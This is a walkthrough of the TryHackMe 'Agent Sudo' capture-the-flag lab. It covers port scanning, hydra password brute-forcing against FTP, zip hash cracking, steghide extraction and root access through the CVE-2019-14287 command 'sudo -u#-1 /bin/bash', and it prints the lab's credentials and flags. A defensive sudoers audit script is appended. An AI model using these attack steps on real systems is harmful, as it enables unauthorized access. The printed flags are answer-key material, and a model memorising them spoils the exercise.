Agent Sudo CTF Walkthrough

Explore the complete guide to solving the Agent Sudo CTF on TryHackMe.


Enumeration

nmap -sV -sT -A -p- 10.10.255.113

Result:

# Nmap 7.93 scan initiated Tue Sep 16 16:26:27 2025 as: nmap -sV -sT -A -p- -oN enum.txt 10.10.255.113
Nmap scan report for ip-10-10-255-113.eu-west-1.compute.internal (10.10.255.113)
Host is up (0.00071s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ef1f5d04d47795066072ecf058f2cc07 (RSA)
|   256 5e02d19ac4e7430662c19e25848ae7ea (ECDSA)
|_  256 2d005cb9fda8c8d880e3924f8b4f18e2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Annoucement
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 02:65:15:29:9B:71 (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.10 - 3.13
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.71 ms ip-10-10-255-113.eu-west-1.compute.internal (10.10.255.113)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep 16 16:26:41 2025 -- 1 IP address (1 host up) scanned in 14.75 seconds
💡
1. How many open ports? 3

After opening the IP on the browser:

This message suggests that we can use the User-Agent header of the HTTP request to find the agent name (which is the 3rd flag).

💡
2. How you redirect yourself to a secret page? user-agent

Using Burp Suite:

  • Intercept the request

  • Send it to Intruder and modify User-Agent by adding a variable

  • Go to Payloads, then choose Brute forcer as the payload type (set the payload options as in the image below), then start the attack

  • We will find that when the User-Agent is C, it redirects to agent_C_attention.php

  • After going to that page, we can find the agent name

💡
3. What is the agent name? chris

Hash cracking and brute-force

Using hydra

hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.255.113

💡
1. FTP password crystal

Log in using ftp

Get those 3 files

Open the text file:

Use a tool such as foremost or steghide:

foremost cutie.png

We will find a zip file

Use zip2john to extract the hash

zip2john 00000067.zip > zip.hash

Then use John to crack the hash

john zip.hash

💡
2. Zip file password alien

After extracting the data in the zip file, we find a text file called To_agentJ.txt

It contains the string QXJlYTUx, which looks encoded, so we will try to decode it using base64

echo QXJlYTUx | base64 -d
💡
3. steg password Area51

Use steghide to extract the data hidden in cute-alien.jpg

steghide extract -sf cute-alien.jpg

Then we will find message.txt

💡
4. Who is the other agent (in full name)? james

Now let's try using ssh with username james and password hackerrules!

💡
5. SSH password hackerrules!

Capture the user flag

💡
1. What is the user flag? b03d975e8c92a7c04146cfa7a5a313c7

Exit ssh, then copy the jpg file to your machine with the following command

sudo scp james@10.10.169.59:Alien_autospy.jpg ~/

For me, this part is not realistic, as you should search with the image on Google and find the answer, which will be something like Roswell alien autopsy

💡
2. What is the incident of the photo called? Roswell alien autopsy

Privilege escalation

Use the following command to see the sudo privileges that james has

sudo -l

A quick search for this sudo permission on bash got me the CVE

💡
1. CVE number for the escalation CVE-2019-14287

Run the following command

sudo -u#-1 /bin/bash

💡
2. b53a02f55b57d4439e3341834d70c062
💡
3. DesKel
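
To check a host for the condition behind CVE-2019-14287 (sudo releases before 1.8.28 treat user ID -1 as 0 when a Runas list is ALL followed by a negated root), the following added example, which is not part of the original walkthrough, scans sudoers text for such rules and compares the sudo version. The function names, sample users and sample version are constructed for illustration, and Runas aliases and include files are not resolved.

```shell
#!/bin/sh
# Added example (not from the walkthrough): audit for CVE-2019-14287 exposure.

# sudo_is_vulnerable VERSION -> status 0 when VERSION is older than 1.8.28.
# A patch suffix such as "p2" is ignored; an empty version counts as vulnerable.
sudo_is_vulnerable() {
  printf '%s\n' "$1" |
    awk -F'[.p]' '{ exit !(($1 * 1000000 + $2 * 1000 + $3) < 1008028) }'
}

# risky_runas_rules: read sudoers text on stdin and print every rule whose
# Runas list starts with ALL and then negates root ("!root" or "!#0").
risky_runas_rules() {
  grep -Ev '^[[:space:]]*#' |
    grep -E '\([[:space:]]*ALL[[:space:]]*,[^)]*![[:space:]]*(root|#0)[[:space:]]*[,:)]' || true
}

# cve_2019_14287_exposed VERSION < sudoers
# Prints the offending rules. Status 0 only when such a rule exists AND the
# sudo version is older than 1.8.28.
cve_2019_14287_exposed() {
  rules=$(risky_runas_rules)
  [ -n "$rules" ] || return 1
  printf '%s\n' "$rules"
  sudo_is_vulnerable "$1"
}

# Constructed sample policy (hypothetical users, not taken from the target).
SAMPLE_SUDOERS='# constructed sample sudoers
root    ALL=(ALL:ALL) ALL
alice   ALL=(ALL, !root) /bin/bash
bob     ALL=(www-data) /usr/bin/systemctl restart apache2
carol   ALL=(ALL,!#0) /usr/bin/vi'

# Real use, as root, assuming the default sudoers locations:
#   cat /etc/sudoers /etc/sudoers.d/* |
#     cve_2019_14287_exposed "$(sudo -V | awk 'NR==1 {print $3}')"
if printf '%s\n' "$SAMPLE_SUDOERS" | cve_2019_14287_exposed 1.8.21p2; then
  echo "exposed: upgrade sudo to 1.8.28 or later and replace !root with an explicit allow list"
fi
```

Rules printed on a patched host are still worth rewriting, since a Runas list that excludes root by negation depends on the parser getting every edge case right.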